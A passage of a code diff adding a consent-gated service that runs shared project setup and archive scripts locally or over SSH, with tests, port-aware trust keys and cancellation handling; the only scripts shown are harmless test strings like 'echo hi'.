+    const empty = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, {}),
+      runLocal: runner
+    })
+    expect(await empty.run(target(), 'setup')).toEqual({ status: 'skipped', reason: 'no-script' })
+
+    const unknownProject = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => null,
+      runLocal: runner
+    })
+    expect(await unknownProject.run(target(), 'setup')).toEqual({ status: 'skipped', reason: 'no-script' })
+
+    // A setup script is not an archive script.
+    const setupOnly = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'echo hi' } }),
+      runLocal: runner
+    })
+    expect(await setupOnly.run(target(), 'archive')).toEqual({ status: 'skipped', reason: 'no-script' })
+
+    const noSshRunner = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'echo hi' } }),
+      runLocal: runner
+    })
+    expect(
+      await noSshRunner.run(target({ ssh: { server: { host: 'h', user: 'u' }, remoteCwd: '/srv/app' } }), 'setup')
+    ).toEqual({ status: 'skipped', reason: 'unavailable' })
+  })
+})
+
+describe('registerProjectSetupHandlers', () => {
+  const stub = () => {
+    const runs: Array<[ProjectSetupTarget, string]> = []
+    const cancels: string[] = []
+    const consents: Array<[string, string]> = []
+    const service = {
+      run: async (t: ProjectSetupTarget, kind: 'setup' | 'archive') => {
+        runs.push([t, kind])
+        return { status: 'started', runKey: 'k', waitForSetup: false } as const
+      },
+      cancel: (runKey: string) => {
+        cancels.push(runKey)
+        return true
+      },
+      submitConsent: (requestId: string, answer: 'approve' | 'skip') => {
+        consents.push([requestId, answer])
+      }
+    }
+    registerProjectSetupHandlers(plat, service)
+    return { runs, cancels, consents }
+  }
+
+  it('registers the whole surface, including the accepted subscribe no-ops', () => {
+    stub()
+    expect(Object.keys(plat.handlers)).toEqual(
+      expect.arrayContaining([IPC.projectSetupRun, IPC.projectSetupCancel])
+    )
+    expect(Object.keys(plat.listeners)).toEqual(
+      expect.arrayContaining([
+        IPC.projectSetupConsentSubmit,
+        IPC.projectSetupSubscribe,
+        IPC.projectSetupUnsubscribe
+      ])
+    )
+    expect(() => plat.listeners[IPC.projectSetupSubscribe]('p1')).not.toThrow()
+    expect(() => plat.listeners[IPC.projectSetupUnsubscribe]('p1')).not.toThrow()
+  })
+
+  it('passes a well-formed target through and answers a malformed one instead of throwing', async () => {
+    const { runs } = stub()
+    const call = plat.handlers[IPC.projectSetupRun]
+    const ssh = { server: { host: 'h', user: 'u', port: 2222 }, remoteCwd: '/srv/app' }
+    expect(await call({ ...target(), worktreePath: '/wt', ssh, bogus: 'x' }, 'archive')).toMatchObject({
+      status: 'started'
+    })
+    expect(runs[0][1]).toBe('archive')
+    expect(runs[0][0]).toEqual({ ...target(), worktreePath: '/wt', ssh })
+
+    for (const bad of [null, {}, { projectId: 'p', projectName: 'n' }, 'nope']) {
+      expect(await call(bad, 'setup')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    }
+    expect(await call(target(), 'launch')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    expect(runs).toHaveLength(1)
+  })
+
+  it('cancel and consent-submit reject junk arguments', async () => {
+    const { cancels, consents } = stub()
+    expect(await plat.handlers[IPC.projectSetupCancel]('k1')).toBe(true)
+    expect(await plat.handlers[IPC.projectSetupCancel](7)).toBe(false)
+    expect(cancels).toEqual(['k1'])
+
+    plat.listeners[IPC.projectSetupConsentSubmit]('r1', 'approve')
+    plat.listeners[IPC.projectSetupConsentSubmit]('r2', 'yes')
+    plat.listeners[IPC.projectSetupConsentSubmit](5, 'approve')
+    expect(consents).toEqual([['r1', 'approve']])
+  })
+})

--- a/src/core/project-setup-service.test.ts
+++ b/src/core/project-setup-service.test.ts
@@ -12,7 +12,8 @@ import {
   type ProjectSettingsSnapshot,
   type ProjectLocalSettings,
   type ProjectSetupConsentRequest,
-  type ProjectSetupEvent
+  type ProjectSetupEvent,
+  type ProjectSetupRunResult
 } from '../shared/project-settings'
 import { IPC } from '../shared/ipc'
 import {
@@ -100,6 +101,34 @@ describe('setupRunKey', () => {
 })
 
 describe('ProjectSetupService — local-sourced scripts', () => {
+  it('mints a FRESH runId per launch, while the runKey (the single-flight key) stays deterministic', async () => {
+    const { runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'echo hi' } }),
+      runLocal: runner
+    })
+    const first = await svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(events().some((e) => e.state === 'done')).toBe(true))
+    const second = await svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(events().filter((e) => e.state === 'done')).toHaveLength(2))
+
+    expect(first.status).toBe('started')
+    expect(second.status).toBe('started')
+    const a = first as Extract<ProjectSetupRunResult, { status: 'started' }>
+    const b = second as Extract<ProjectSetupRunResult, { status: 'started' }>
+    // Same script, same location => the SAME single-flight key (that is what makes a concurrent
+    // second launch `busy`)...
+    expect(b.runKey).toBe(a.runKey)
+    // ...and a DIFFERENT run identity, because both runs' `seq` counters start at 1 and a client
+    // folding on runKey alone would swallow the second run as the first one's stale tail.
+    expect(b.runId).not.toBe(a.runId)
+    const ids = new Set(events().map((e) => e.runId))
+    expect(ids).toEqual(new Set([a.runId, b.runId]))
+    // Each run numbers its own events from 1.
+    expect(events().filter((e) => e.runId === b.runId).map((e) => e.seq)).toEqual([1, 2, 3])
+  })
+
   it('runs a local-sourced script without any consent prompt', async () => {
     const { calls, runner } = recorder()
     const svc = new ProjectSetupService({
@@ -108,7 +137,14 @@ describe('ProjectSetupService — local-sourced scripts', () => {
       runLocal: runner
     })
     const res = await svc.run(target(), 'setup')
-    expect(res).toEqual({ status: 'started', runKey: setupRunKey(target(), 'setup'), waitForSetup: true })
+    // `runId` is a fresh uuid per launch (unlike the deterministic runKey), so it is matched by
+    // shape: it is what tells this run from the NEXT run of the same script.
+    expect(res).toEqual({
+      status: 'started',
+      runKey: setupRunKey(target(), 'setup'),
+      runId: expect.any(String),
+      waitForSetup: true
+    })
     expect(consentRequests()).toEqual([])
 
     await vi.waitFor(() => expect(events().some((e) => e.state === 'done')).toBe(true))
@@ -475,7 +511,7 @@ describe('registerProjectSetupHandlers', () => {
     const service = {
       run: async (t: ProjectSetupTarget, kind: 'setup' | 'archive') => {
         runs.push([t, kind])
-        return { status: 'started', runKey: 'k', waitForSetup: false } as const
+        return { status: 'started', runKey: 'k', runId: 'run-1', waitForSetup: false } as const
       },
       cancel: (runKey: string) => {
         cancels.push(runKey)

--- a/src/core/project-setup-service.ts
+++ b/src/core/project-setup-service.ts
@@ -1,0 +1,277 @@
+import { randomUUID } from 'node:crypto'
+import os from 'os'
+import path from 'path'
+import { IPC } from '../shared/ipc'
+import {
+  projectTrustContent,
+  resolveProjectSettings,
+  type ProjectSettingsDoc,
+  type ProjectSettingsSnapshot,
+  type ProjectSetupConsentAnswer,
+  type ProjectSetupConsentRequest,
+  type ProjectSetupEvent,
+  type ProjectSetupKind,
+  type ProjectSetupRunResult
+} from '../shared/project-settings'
+import type { SshConnection } from '../shared/ssh'
+import { platform } from './platform'
+import { ProjectTrustStore, hashTrustContent, localTrustKey, sshTrustKey } from './project-trust-store'
+
+/**
+ * Runs a project's `setup`/`archive` script behind the trust gate.
+ *
+ * The load-bearing invariants:
+ *  - Only a SHARED-sourced script is gated. A value the user typed into this machine's own local
+ *    overlay is their own instruction and runs promptless; a value that arrived through git (or
+ *    from a remote host) is hostile input until a human approves it at that location.
+ *  - What is approved is the FAMILY, not the one script: the trust content covers setupScript AND
+ *    archiveScript (`projectTrustContent('setup', …)`), hashed from the SHARED document alone —
+ *    never the merged/effective one, or a local override could launder a shared change past the
+ *    hash.
+ *  - Trust is keyed by LOCATION (`localTrustKey`/`sshTrustKey`), never by project id: ids come out
+ *    of an attacker-controlled `project.json` (hostile-project-json).
+ *  - The answer is a trichotomy — approve / skip / nobody-answered. Only `approve` records and
+ *    runs; an expired prompt is never a retroactive yes.
+ *  - Prompts are serialized app-wide: one dialog at a time, so a workspace opening five projects
+ *    cannot stack five modals over each other.
+ *
+ * Spawning itself is injected (`runLocal`/`runSsh`) — this file knows nothing about child_process
+ * or ssh, which is also what makes the gate testable without a shell.
+ */
+
+/** How long an unanswered consent prompt is held before it is dismissed and reported as
+ *  `unanswered` — same bound as the ssh passphrase prompt. */
+export const CONSENT_EXPIRY_MS = 300_000
+
+export interface ProjectSetupTarget {
+  projectId: string
+  projectName: string
+  /** Local project root — the trust location, and the spawn cwd when there is no worktree. */
+  rootPath: string
+  /** Set for a worktree run: the worktree dir (else rootPath). */
+  worktreePath?: string
+  ssh?: { server: Pick<SshConnection, 'host' | 'user' | 'port' | 'identityFile'>; remoteCwd: string }
+}
+
+export type ProjectSetupRunner = (opts: {
+  script: string
+  cwd: string
+  env: Record<string, string>
+  onChunk: (text: string) => void
+  signal: AbortSignal
+  ssh?: ProjectSetupTarget['ssh']
+}) => Promise<{ exitCode: number }>
+
+export interface ProjectSetupDeps {
+  trust: ProjectTrustStore
+  /** Reads the project's settings state (shared+local) — injected so both shells reuse WorkspaceStore. */
+  readSettings(projectId: string): Promise<ProjectSettingsSnapshot | null>
+  runLocal?: ProjectSetupRunner
+  runSsh?: ProjectSetupRunner
+  now?: () => number
+}
+
+/** Single-flight identity: one live run per LOCATION per kind. Two canvas nodes pointing at the
+ *  same folder are the same run, and a hostile `project.json` cannot buy a second concurrent run
+ *  by renaming its project id. */
+export function setupRunKey(target: ProjectSetupTarget, kind: ProjectSetupKind): string {
+  return `${kind}\0${runLocationKey(target)}`
+}
+
+function runLocationKey(target: ProjectSetupTarget): string {
+  return target.ssh
+    ? sshTrustKey({ server: target.ssh.server, remoteCwd: target.ssh.remoteCwd })
+    : localTrustKey(target.worktreePath ?? target.rootPath)
+}
+
+/** The APPROVAL location — the project root, so a per-worktree run inherits the root's approval
+ *  (the settings document it executes is the root's, shared by every worktree of that repo). */
+function trustKeyFor(target: ProjectSetupTarget): string {
+  return target.ssh
+    ? sshTrustKey({ server: target.ssh.server, remoteCwd: target.ssh.remoteCwd })
+    : localTrustKey(target.rootPath)
+}
+
+function locationLabel(target: ProjectSetupTarget): string {
+  if (target.ssh) return `${target.ssh.server.user}@${target.ssh.server.host}:${target.ssh.remoteCwd}`
+  const abs = path.resolve(target.rootPath)
+  const home = os.homedir()
+  return home && (abs === home || abs.startsWith(home + path.sep)) ? `~${abs.slice(home.length)}` : abs
+}
+
+interface ActiveRun {
+  runKey: string
+  projectId: string
+  kind: ProjectSetupKind
+  abort: AbortController
+  seq: number
+  closed: boolean
+}
+
+export class ProjectSetupService {
+  private readonly active = new Map<string, ActiveRun>()
+  private readonly pending = new Map<string, (answer: ProjectSetupConsentAnswer | undefined) => void>()
+  /** App-wide prompt queue: each ask chains onto the previous one, so only one dialog is live. */
+  private consentQueue: Promise<unknown> = Promise.resolve()
+
+  constructor(private readonly deps: ProjectSetupDeps) {}
+
+  async run(target: ProjectSetupTarget, kind: ProjectSetupKind): Promise<ProjectSetupRunResult> {
+    const snap = await this.deps.readSettings(target.projectId)
+    const resolved = resolveProjectSettings(snap?.local, snap?.shared ?? undefined)
+    const picked = kind === 'setup' ? resolved.setup.setupScript : resolved.setup.archiveScript
+    const script = picked?.value ?? ''
+    if (!script.trim()) return { status: 'skipped', reason: 'no-script' }
+
+    const runKey = setupRunKey(target, kind)
+    if (this.active.has(runKey)) return { status: 'skipped', reason: 'busy' }
+    const runner = target.ssh ? this.deps.runSsh : this.deps.runLocal
+    if (!runner) return { status: 'skipped', reason: 'unavailable' }
+
+    // Claimed BEFORE the consent await on purpose: while a dialog for this location is open, a
+    // second launch must be `busy`, not a second dialog asking about the same script.
+    const entry: ActiveRun = { runKey, projectId: target.projectId, kind, abort: new AbortController(), seq: 0, closed: false }
+    this.active.set(runKey, entry)
+    const abandon = (reason: 'declined' | 'unanswered' | 'unavailable' | 'no-script'): ProjectSetupRunResult => {
+      this.active.delete(runKey)
+      return { status: 'skipped', reason }
+    }
+
+    if (picked!.source === 'shared') {
+      const sharedDoc: ProjectSettingsDoc = snap?.shared ?? {}
+      const content = projectTrustContent('setup', sharedDoc)
+      // Unreachable by construction (a 'shared' source means the shared doc carries this script);
+      // fail closed rather than run something no hash covers.
+      if (content === null) return abandon('no-script')
+      const hash = hashTrustContent(content)
+      const key = trustKeyFor(target)
+      let trusted: boolean
+      try {
+        trusted = await this.deps.trust.isTrusted(key, 'setup', hash)
+      } catch {
+        return abandon('unavailable')
+      }
+      if (!trusted) {
+        const answer = await this.askConsent(key, {
+          kind,
+          projectName: target.projectName,
+          locationLabel: locationLabel(target),
+          script
+        })
+        if (answer !== 'approve') return abandon(answer === 'skip' ? 'declined' : 'unanswered')
+        try {
+          await this.deps.trust.record(key, 'setup', hash, new Date(this.now()).toISOString())
+        } catch {
+          // The approval could not be persisted, so it is not an approval — fail closed rather
+          // than run on a grant that exists only in memory.
+          return abandon('unavailable')
+        }
+      }
+    }
+
+    void this.execute(entry, runner, script, target)
+    return { status: 'started', runKey, waitForSetup: resolved.setup.waitForSetup?.value === true }
+  }
+
+  /** Aborts a live run. `false` = nothing by that runKey is running (already finished, or never was). */
+  cancel(runKey: string): boolean {
+    const entry = this.active.get(runKey)
+    if (!entry) return false
+    entry.abort.abort()
+    return true
+  }
+
+  /** Renderer answer for a pending consent prompt. An unknown/stale requestId (expired, double
+   *  submit) and an unrecognized answer are silent no-ops — never an approval. */
+  submitConsent(requestId: string, answer: ProjectSetupConsentAnswer): void {
+    if (answer !== 'approve' && answer !== 'skip') return
+    this.pending.get(requestId)?.(answer)
+  }
+
+  private now(): number {
+    return this.deps.now ? this.deps.now() : Date.now()
+  }
+
+  private askConsent(
+    trustKey: string,
+    req: Omit<ProjectSetupConsentRequest, 'requestId' | 'previouslyApproved'>
+  ): Promise<ProjectSetupConsentAnswer | undefined> {
+    const step = this.consentQueue.then(async () => {
+      // Read at PROMPT time, not at enqueue time: an earlier prompt in the queue may have just
+      // recorded an approval for this same location. Dialog copy only — the grant was the
+      // `isTrusted` hash comparison, which already said no.
+      const previouslyApproved = !!(await this.deps.trust.getRecord(trustKey, 'setup'))
+      return new Promise<ProjectSetupConsentAnswer | undefined>((resolve) => {
+        const requestId = randomUUID()
+        const timer = setTimeout(() => {
+          this.pending.delete(requestId)
+          platform().broadcast(IPC.projectSetupConsentDismiss, { requestId })
+          resolve(undefined) // expired, NOT declined
+        }, CONSENT_EXPIRY_MS)
+        timer.unref?.()
+        this.pending.set(requestId, (answer) => {
+          clearTimeout(timer)
+          this.pending.delete(requestId)
+          resolve(answer)
+        })
+        const payload: ProjectSetupConsentRequest = { ...req, requestId, previouslyApproved }
+        platform().broadcast(IPC.projectSetupConsentRequest, payload)
+      })
+    })
+    // A rejected step must not poison the queue for every later prompt.
+    this.consentQueue = step.catch(() => {})
+    return step
+  }
+
+  private async execute(
+    entry: ActiveRun,
+    runner: ProjectSetupRunner,
+    script: string,
+    target: ProjectSetupTarget
+  ): Promise<void> {
+    // For an ssh run every path the script sees is the REMOTE one — a local Mac path in these env
+    // vars would name a directory that does not exist on the host.
+    const cwd = target.ssh ? target.ssh.remoteCwd : target.worktreePath ?? target.rootPath
+    const rootPath = target.ssh ? target.ssh.remoteCwd : target.rootPath
+    const env = {
+      NODETERM_ROOT_PATH: rootPath,
+      NODETERM_WORKTREE_PATH: cwd,
+      NODETERM_PROJECT_NAME: target.projectName
+    }
+    this.emit(entry, { state: 'running' })
+    let exitCode: number | undefined
+    let threw = false
+    try {
+      const res = await runner({
+        script,
+        cwd,
+        env,
+        // Raw pass-through: the runner edge does the debouncing/capping, so nothing is coalesced
+        // twice and this layer never holds output back.
+        onChunk: (text) => {
+          if (text) this.emit(entry, { state: 'running', chunk: text })
+        },
+        signal: entry.abort.signal,
+        ssh: target.ssh
+      })
+      exitCode = res.exitCode
+    } catch {
+      threw = true
+    } finally {
+      this.active.delete(entry.runKey)
+    }
+    if (entry.abort.signal.aborted) this.emit(entry, { state: 'cancelled', exitCode })
+    else if (threw) this.emit(entry, { state: 'failed' })
+    else this.emit(entry, { state: exitCode === 0 ? 'done' : 'failed', exitCode })
+    entry.closed = true
+  }
+
+  private emit(entry: ActiveRun, ev: Omit<ProjectSetupEvent, 'runKey' | 'kind' | 'seq'>): void {
+    // A chunk arriving after the terminal event (a runner that keeps draining) would reopen a run
+    // the UI has already closed out.
+    if (entry.closed) return
+    entry.seq += 1
+    const full: ProjectSetupEvent = { runKey: entry.runKey, kind: entry.kind, seq: entry.seq, ...ev }
+    platform().broadcast(IPC.projectSetupEvent(entry.projectId), full)
+  }
+}

--- a/src/core/project-setup-service.ts
+++ b/src/core/project-setup-service.ts
@@ -92,6 +92,15 @@ function trustKeyFor(target: ProjectSetupTarget): string {
     : localTrustKey(target.rootPath)
 }
 
+/** Exactly the two fields `projectTrustContent('setup', …)` hashes, from the SHARED document — so a
+ *  dialog rendering this shows the full extent of what one approval covers, and nothing else. */
+function familyScripts(sharedDoc: ProjectSettingsDoc): ProjectSetupConsentRequest['scripts'] {
+  const out: ProjectSetupConsentRequest['scripts'] = {}
+  if (sharedDoc.setup?.setupScript !== undefined) out.setup = sharedDoc.setup.setupScript
+  if (sharedDoc.setup?.archiveScript !== undefined) out.archive = sharedDoc.setup.archiveScript
+  return out
+}
+
 function locationLabel(target: ProjectSetupTarget): string {
   if (target.ssh) return `${target.ssh.server.user}@${target.ssh.server.host}:${target.ssh.remoteCwd}`
   const abs = path.resolve(target.rootPath)
@@ -106,6 +115,9 @@ interface ActiveRun {
   abort: AbortController
   seq: number
   closed: boolean
+  /** The dialog this run is currently blocked on, so `cancel` can close it instead of leaving a
+   *  modal up for a run that no longer exists. */
+  consentRequestId?: string
 }
 
 export class ProjectSetupService {
@@ -152,12 +164,17 @@ export class ProjectSetupService {
         return abandon('unavailable')
       }
       if (!trusted) {
-        const answer = await this.askConsent(key, {
+        const answer = await this.askConsent(entry, key, {
           kind,
           projectName: target.projectName,
           locationLabel: locationLabel(target),
-          script
+          // The FAMILY is what gets approved, so the dialog is handed both scripts — and from the
+          // shared document alone, so what it renders is exactly what the hash covers.
+          scripts: familyScripts(sharedDoc)
         })
+        // A cancel raised while the dialog was open already aborted this run; it must not proceed
+        // on an answer (or a race with one) that arrived anyway.
+        if (entry.abort.signal.aborted) return abandon('declined')
         if (answer !== 'approve') return abandon(answer === 'skip' ? 'declined' : 'unanswered')
         try {
           await this.deps.trust.record(key, 'setup', hash, new Date(this.now()).toISOString())
@@ -169,15 +186,27 @@ export class ProjectSetupService {
       }
     }
 
+    // Covers a cancel raised during any of the awaits above (readSettings, the trust read/write).
+    if (entry.abort.signal.aborted) return abandon('declined')
+
     void this.execute(entry, runner, script, target)
     return { status: 'started', runKey, waitForSetup: resolved.setup.waitForSetup?.value === true }
   }
 
-  /** Aborts a live run. `false` = nothing by that runKey is running (already finished, or never was). */
+  /** Aborts a run — live OR still waiting at its consent dialog. `false` = nothing by that runKey
+   *  exists (already finished, or never did). */
   cancel(runKey: string): boolean {
     const entry = this.active.get(runKey)
     if (!entry) return false
     entry.abort.abort()
+    const requestId = entry.consentRequestId
+    if (requestId) {
+      // The run this dialog belonged to is gone: close it (and free the queue) rather than leave a
+      // modal whose answer can no longer mean anything. Resolving the pending entry also drops it
+      // from `pending`, so a late approve for it is a no-op.
+      this.pending.get(requestId)?.(undefined)
+      platform().broadcast(IPC.projectSetupConsentDismiss, { requestId })
+    }
     return true
   }
 
@@ -193,27 +222,34 @@ export class ProjectSetupService {
   }
 
   private askConsent(
+    entry: ActiveRun,
     trustKey: string,
     req: Omit<ProjectSetupConsentRequest, 'requestId' | 'previouslyApproved'>
   ): Promise<ProjectSetupConsentAnswer | undefined> {
     const step = this.consentQueue.then(async () => {
+      // Cancelled while queued behind another dialog — never raise one for a run that is gone.
+      if (entry.abort.signal.aborted) return undefined
       // Read at PROMPT time, not at enqueue time: an earlier prompt in the queue may have just
       // recorded an approval for this same location. Dialog copy only — the grant was the
       // `isTrusted` hash comparison, which already said no.
       const previouslyApproved = !!(await this.deps.trust.getRecord(trustKey, 'setup'))
       return new Promise<ProjectSetupConsentAnswer | undefined>((resolve) => {
         const requestId = randomUUID()
-        const timer = setTimeout(() => {
+        const settle = (answer: ProjectSetupConsentAnswer | undefined): void => {
           this.pending.delete(requestId)
+          entry.consentRequestId = undefined
+          resolve(answer)
+        }
+        const timer = setTimeout(() => {
+          settle(undefined) // expired, NOT declined
           platform().broadcast(IPC.projectSetupConsentDismiss, { requestId })
-          resolve(undefined) // expired, NOT declined
         }, CONSENT_EXPIRY_MS)
         timer.unref?.()
         this.pending.set(requestId, (answer) => {
           clearTimeout(timer)
-          this.pending.delete(requestId)
-          resolve(answer)
+          settle(answer)
         })
+        entry.consentRequestId = requestId
         const payload: ProjectSetupConsentRequest = { ...req, requestId, previouslyApproved }
         platform().broadcast(IPC.projectSetupConsentRequest, payload)
       })

--- a/src/core/project-setup-service.ts
+++ b/src/core/project-setup-service.ts
@@ -110,6 +110,9 @@ function locationLabel(target: ProjectSetupTarget): string {
 
 interface ActiveRun {
   runKey: string
+  /** Unique per launch, unlike `runKey` (which is the deterministic single-flight key). Every event
+   *  carries it so a client can tell this run from the PREVIOUS run of the same script. */
+  runId: string
   projectId: string
   kind: ProjectSetupKind
   abort: AbortController
@@ -142,7 +145,7 @@ export class ProjectSetupService {
 
     // Claimed BEFORE the consent await on purpose: while a dialog for this location is open, a
     // second launch must be `busy`, not a second dialog asking about the same script.
-    const entry: ActiveRun = { runKey, projectId: target.projectId, kind, abort: new AbortController(), seq: 0, closed: false }
+    const entry: ActiveRun = { runKey, runId: randomUUID(), projectId: target.projectId, kind, abort: new AbortController(), seq: 0, closed: false }
     this.active.set(runKey, entry)
     const abandon = (reason: 'declined' | 'unanswered' | 'unavailable' | 'no-script'): ProjectSetupRunResult => {
       this.active.delete(runKey)
@@ -190,7 +193,14 @@ export class ProjectSetupService {
     if (entry.abort.signal.aborted) return abandon('declined')
 
     void this.execute(entry, runner, script, target)
-    return { status: 'started', runKey, waitForSetup: resolved.setup.waitForSetup?.value === true }
+    // `runId` travels back with the ack so the initiator can attach THIS run (not the previous run
+    // of the same script, which shares `runKey`) to its own lane.
+    return {
+      status: 'started',
+      runKey,
+      runId: entry.runId,
+      waitForSetup: resolved.setup.waitForSetup?.value === true
+    }
   }
 
   /** Aborts a run — live OR still waiting at its consent dialog. `false` = nothing by that runKey
@@ -302,12 +312,18 @@ export class ProjectSetupService {
     entry.closed = true
   }
 
-  private emit(entry: ActiveRun, ev: Omit<ProjectSetupEvent, 'runKey' | 'kind' | 'seq'>): void {
+  private emit(entry: ActiveRun, ev: Omit<ProjectSetupEvent, 'runKey' | 'runId' | 'kind' | 'seq'>): void {
     // A chunk arriving after the terminal event (a runner that keeps draining) would reopen a run
     // the UI has already closed out.
     if (entry.closed) return
     entry.seq += 1
-    const full: ProjectSetupEvent = { runKey: entry.runKey, kind: entry.kind, seq: entry.seq, ...ev }
+    const full: ProjectSetupEvent = {
+      runKey: entry.runKey,
+      runId: entry.runId,
+      kind: entry.kind,
+      seq: entry.seq,
+      ...ev
+    }
     platform().broadcast(IPC.projectSetupEvent(entry.projectId), full)
   }
 }

--- a/src/core/project-setup-service.ts
+++ b/src/core/project-setup-service.ts
@@ -34,6 +34,8 @@ import { ProjectTrustStore, hashTrustContent, localTrustKey, sshTrustKey } from 
  *    runs; an expired prompt is never a retroactive yes.
  *  - Prompts are serialized app-wide: one dialog at a time, so a workspace opening five projects
  *    cannot stack five modals over each other.
+ *  - The prompt goes to the HOST's own UI (`sendConsent`), never to the broadcast fan-out: the
+ *    question — and the script bytes it renders — belongs to the human at this machine.
  *
  * Spawning itself is injected (`runLocal`/`runSsh`) — this file knows nothing about child_process
  * or ssh, which is also what makes the gate testable without a shell.
@@ -69,6 +71,19 @@ export interface ProjectSetupDeps {
   runLocal?: ProjectSetupRunner
   runSsh?: ProjectSetupRunner
   now?: () => number
+  /**
+   * WHERE a consent prompt (and its dismiss) is delivered. Injected because the answer differs per
+   * shell and `platform().broadcast` — the only fan-out the core can see — is the WRONG answer on
+   * the desktop: it also reaches every relay PEER, which would (a) disclose the shared script
+   * bodies, the exact bytes being approved, to a guest who may have no other way to read that file,
+   * and (b) put the host's trust dialog on a screen that is not the host's. Electron passes its
+   * main-window-only send; the Server Edition leaves the default, where every attached client is an
+   * authenticated operator of that host and broadcast is exactly right.
+   *
+   * Only the CONSENT pair is routed this way. Run `events` keep broadcasting: they are the canvas's
+   * shared run state (a peer's canvas shows the same run), not the approval question.
+   */
+  sendConsent?: (channel: string, payload: unknown) => void
 }
 
 /** Single-flight identity: one live run per LOCATION per kind. Two canvas nodes pointing at the
@@ -215,9 +230,21 @@ export class ProjectSetupService {
       // modal whose answer can no longer mean anything. Resolving the pending entry also drops it
       // from `pending`, so a late approve for it is a no-op.
       this.pending.get(requestId)?.(undefined)
-      platform().broadcast(IPC.projectSetupConsentDismiss, { requestId })
+      this.sendConsent(IPC.projectSetupConsentDismiss, { requestId })
     }
     return true
+  }
+
+  /**
+   * Shell shutdown: abort every run still in flight. A local run is a DETACHED process group
+   * (setsid, so a cancel can SIGKILL the whole tree) — which is also why quitting without this
+   * leaves `npm ci` churning with nothing left to report to, and, on the ssh leg, an orphaned remote
+   * command. Goes through `cancel`, so a run parked at its consent dialog is closed and its dialog
+   * dismissed too. Idempotent: Electron's `before-quit` runs twice, and the second pass finds
+   * nothing left.
+   */
+  disposeAll(): void {
+    for (const runKey of [...this.active.keys()]) this.cancel(runKey)
   }
 
   /** Renderer answer for a pending consent prompt. An unknown/stale requestId (expired, double
@@ -229,6 +256,12 @@ export class ProjectSetupService {
 
   private now(): number {
     return this.deps.now ? this.deps.now() : Date.now()
+  }
+
+  /** The consent pair's delivery, per shell (see `ProjectSetupDeps.sendConsent`). */
+  private sendConsent(channel: string, payload: unknown): void {
+    if (this.deps.sendConsent) this.deps.sendConsent(channel, payload)
+    else platform().broadcast(channel, payload)
   }
 
   private askConsent(
@@ -252,7 +285,7 @@ export class ProjectSetupService {
         }
         const timer = setTimeout(() => {
           settle(undefined) // expired, NOT declined
-          platform().broadcast(IPC.projectSetupConsentDismiss, { requestId })
+          this.sendConsent(IPC.projectSetupConsentDismiss, { requestId })
         }, CONSENT_EXPIRY_MS)
         timer.unref?.()
         this.pending.set(requestId, (answer) => {
@@ -261,7 +294,7 @@ export class ProjectSetupService {
         })
         entry.consentRequestId = requestId
         const payload: ProjectSetupConsentRequest = { ...req, requestId, previouslyApproved }
-        platform().broadcast(IPC.projectSetupConsentRequest, payload)
+        this.sendConsent(IPC.projectSetupConsentRequest, payload)
       })
     })
     // A rejected step must not poison the queue for every later prompt.

--- a/src/core/project-trust-store.test.ts
+++ b/src/core/project-trust-store.test.ts
@@ -20,6 +20,24 @@ describe('trust keys', () => {
     expect(ssh).toContain('u@h')
     expect(ssh).not.toBe(localTrustKey('/srv/x'))
   })
+
+  // `user@host` alone is not a machine. A jump host, a container, and a VM behind the same DNS name
+  // are routinely separated by PORT ONLY (sshAttachmentId already keys on host+user+port for exactly
+  // this reason), so an approval granted for the box on :2222 must not silently authorize the box on
+  // :22. The trust file is unreleased, so the key gains the port with no migration.
+  it('ssh keys are per PORT: the default :22 and an explicit :2222 are different locations', () => {
+    const base = { host: 'h', user: 'u' }
+    const implicit = sshTrustKey({ server: base, remoteCwd: '/srv/x' })
+    const explicit22 = sshTrustKey({ server: { ...base, port: 22 }, remoteCwd: '/srv/x' })
+    const alt = sshTrustKey({ server: { ...base, port: 2222 }, remoteCwd: '/srv/x' })
+    // An omitted port IS 22 (that is what ssh dials), so the two must be the SAME location.
+    expect(implicit).toBe(explicit22)
+    expect(alt).not.toBe(implicit)
+    expect(implicit).toContain('u@h:22')
+    expect(alt).toContain('u@h:2222')
+    // Still per-remoteCwd, and still not a local key.
+    expect(sshTrustKey({ server: { ...base, port: 2222 }, remoteCwd: '/srv/y' })).not.toBe(alt)
+  })
 })
 
 describe('ProjectTrustStore', () => {

--- a/src/core/project-trust-store.ts
+++ b/src/core/project-trust-store.ts
@@ -17,8 +17,17 @@ export function localTrustKey(cwd: string): string {
   return `local\0${path.resolve(cwd)}`
 }
 
-export function sshTrustKey(ssh: { server: Pick<SshConnection, 'host' | 'user'>; remoteCwd: string }): string {
-  return `ssh\0${sshHostKey(ssh.server)}\0${ssh.remoteCwd}`
+/**
+ * `user@host:port` + remote path. The PORT is part of the location, not decoration: one `user@host`
+ * is routinely several different machines — a container, a VM, a jump host behind the same DNS name
+ * — separated by port alone (`sshAttachmentId` keys on host+user+port for exactly this reason). An
+ * approval granted for the box on :2222 must never authorize the box on :22. An omitted port IS 22,
+ * because that is what ssh dials, so the two spellings are one key.
+ */
+export function sshTrustKey(
+  ssh: { server: Pick<SshConnection, 'host' | 'user' | 'port'>; remoteCwd: string }
+): string {
+  return `ssh\0${sshHostKey(ssh.server)}:${ssh.server.port ?? 22}\0${ssh.remoteCwd}`
 }
 
 export function hashTrustContent(content: string): string {

--- a/src/core/setup-output-stream.ts
+++ b/src/core/setup-output-stream.ts
@@ -1,0 +1,87 @@
+/**
+ * The output discipline every `ProjectSetupRunner` shares: one capped budget, debounced chunk
+ * delivery, exactly one truncation note.
+ *
+ * Extracted from the local runner when the SSH runner arrived, because the rules here are a
+ * CONTRACT the service layer and the UI both depend on ("stdout+stderr interleaved, capped",
+ * one event per burst rather than per line) — not an implementation detail either runner is free
+ * to drift on. Two copies would drift: the first cap bump or note reword would land in one file
+ * and be forgotten in the other, and the UI would silently show two different truncation stories
+ * depending on whether the project happened to be local or remote.
+ */
